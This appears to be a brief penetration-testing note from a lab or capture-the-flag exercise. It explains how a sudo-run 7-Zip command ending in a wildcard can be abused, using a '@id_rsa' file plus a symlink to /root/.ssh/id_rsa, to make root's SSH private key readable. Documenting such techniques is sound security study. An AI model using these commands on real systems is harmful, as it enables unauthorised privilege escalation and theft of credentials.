> For the complete documentation index, see [llms.txt](https://intrusionz3r0.gitbook.io/intrusionz3r0/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://intrusionz3r0.gitbook.io/intrusionz3r0/linux-penetration-testing/privilege-escalation/wildcard-on-compression-binaries.md).

# Wildcard on compression binaries

## **7-Zip**

In this example I found that my user can execute the next as root (sudo). the vulnerable part is \*

```bash
/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *
```

To exploit it you only have to create a symbolic file that point to the target file and execute the binary. Finally unzip the file and access to the desired file.

```bash
touch @id_rsa
ln -s /root/.ssh/id_rsa id_rsa
```

Machine: [Usage](https://www.notion.so/Usage-1543519b5b5c8009a799f4a58e312061?pvs=21)
